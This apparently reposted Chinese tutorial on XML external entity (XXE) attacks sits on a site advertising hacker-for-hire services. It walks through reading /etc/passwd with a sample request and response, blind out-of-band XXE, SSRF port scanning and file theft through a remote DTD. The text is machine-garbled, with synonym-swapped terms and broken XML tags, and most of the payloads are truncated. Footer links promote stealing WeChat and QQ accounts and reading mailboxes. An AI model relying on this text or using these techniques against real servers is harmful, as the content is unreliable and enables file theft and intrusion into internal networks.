XXE缝隙使用技巧:从XML到长途代码履行

访客5年前关于黑客接单969


你的Web运用是否存在XXE缝隙?
假如你的运用是经过用户上传处理XML文件或POST恳求(例如将SAML用于单点登录服务乃至是RSS)的,那么你很有或许会遭到XXE的进犯。XXE是一种十分常见的缝隙类型,咱们简直每天都会碰到它。在上一年的几回web运用浸透中,咱们就成功的运用了好几回。
什么是XXE
简略来说,XXE便是XML外部实体注入。当答应引证外部实体时,经过结构歹意内容,就或许导致恣意文件读取、体系指令履行、内网端口勘探、进犯内网网站等损害。
例如,假如你当时运用的程序为PHP,则能够将libxml_disable_entity_loader设置为TRUE来禁用外部实体,然后起到防护的意图。
根本运用
一般进犯者会将payload注入XML文件中,一旦文件被履行,将会读取服务器上的本地文件,并对内网建议拜访扫描内部 *** 端口。换而言之,XXE是一种从本地抵达各种服务的办法。此外,在必定程度上这也或许协助进犯者绕过防火墙规矩过滤或身份验证检查。
以下是一个简略的XML代码POST恳求示例:
POST /vulnerable HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://test.com/test.html
Content-Type: application/xml
Content-Length: 294
Cookie: mycookie=cookies;
Connection: close
Upgrade-Insecure-Requests: 1
catalog>
   core id="test101">
      author>John, Doeauthor>
      title>I love XMLtitle>
      category>Computerscategory>
      price>9.99price>
      date>2019-10-01date>
      description>XML is the best!description>
   core>
catalog>
之后,上述代码将交由服务器的XML处理器解析。代码被解说并回来:{“Request Successful”: “Added!”}
现在,当进犯者企图乱用XML代码解析时会发作什么?让咱们修改代码并包括咱们的歹意payload:
]>
catalog>
   core id="test101">
      author>John, Doeauthor>
      title>I love XMLtitle>
      category>Computerscategory>
      price>9.99price>
      date>2019-10-01date>
      description>&xxe;description>
   core>
catalog>
代码被解说并回来:
{"error": "no results for description root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/ *** in:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync...
Blind OOB XXE
如上例所示,服务器将/etc/passwd文件的内容作为呼应回来给咱们的XXE。但是在某些状况下,即使服务器或许存在XXE,也不会向进犯者的浏览器或署理回来任何呼应。遇到这种状况,咱们能够运用Blind XXE缝隙来构建一条外带数据(OOB)通道来读取数据。尽管咱们无法直接检查文件内容,但咱们依然能够运用易受进犯的服务器作为署理,在外部 *** 上履行扫描以及代码。
场景1 – 端口扫描
在之一个示例中,咱们经过URI将恳求指向了/etc/passwd文件,并终究成功的为咱们回来了文件中的内容。除此之外,咱们也能够运用http URI并强制服务器向咱们指定的端点和端口发送GET恳求,将XXE转换为SSRF(服务器端恳求假造)。
以下代码将测验与端口8080通讯,依据呼应时刻/长度,进犯者将能够判别该端口是否已被敞开。
]>
catalog>
   core id="test101">
      author>John, Doeauthor>
      title>I love XMLtitle>
      category>Computerscategory>
      price>9.99price>
      date>2019-10-01date>
      description>&xxe;description>
   core>
catalog>
场景2 – 经过DTD盗取文件
外部文档类型界说(DTD)文件可被用于触发OOB XXE。进犯者将.dtd文件保管在VPS上,使长途易受进犯的服务器获取该文件并履行其间的歹意指令。
以下恳求将被发送到运用程序以演示和测验该办法:
catalog>
   core id="test101">
      author>John, Doeauthor>
      title>I love XMLtitle>
      category>Computerscategory>
      price>9.99price>
      date>2019-10-01date>
      description>&xxe;description>
   core>
catalog>
上述代码一旦由易受进犯的服务器处理,就会向咱们的长途服务器发送恳求,查找包括咱们的payload的DTD文件:
"file:///etc/passwd">

[1] [2]  黑客接单网

相关文章

浅谈Web客户端追寻

跟着互联网络的广泛遍及,数以亿计网民的网络行为数据早已成为最名贵的资源,企业经过形形色色的各种手法了解网民的行为和隐私数据,用于广告投递、用户爱好剖析等,从而作为决议计划的根据。运用Web客户端对用户...

黑客网站,从哪找黑客盗微信号,游戏损友圈咋样找黑客黑了你

商城侵略:http://jj.acfun.tv存在文件包括缝隙echo "The Quick Brown Fox Jumps Over The Lazy Dog" | tr 'A-Za-z' 'N-Z...

记我的一次账号绑架和BLIND XSS缝隙发现进程

大家好,本文我要共享的是我参加Hackerone某约请项目,经过方针测验网站的高档功能模块(PRO features)完成了更多攻击面测验,并发现了两个严峻缝隙,获得了$7000美金的不菲奖赏。 第...

破解QQ空间相册密码_黑客读取邮箱联系人-黑客接单平台

ARP全称为Address Resolution Protocol,即地址解析协议。 是依据IP地址获取物理地址的一个TCP/IP协议。 主机发送信息时将包括 方针IP地址的ARP恳求播送到网络上的一...

今年朋友介绍玩一个赌博平台输了十多万进去,现在

2019年6月,Microsoft发布了一条安全更新。 该更新针对CVE-2019-1040漏洞进行修复。 此次漏洞,攻击者可以通过中间人攻击,绕过NTLM MIC(消息完整性检查)保护,将身份验证流...

黑防联盟,看门狗2黑客怎么找,github找黑客

这种查询的成果必定是这种http://tiechemo.com/page.asp?id=1和1=2(由于120大于109)。 咱们接着测验,缝隙运用:inurl:*.php?id=12...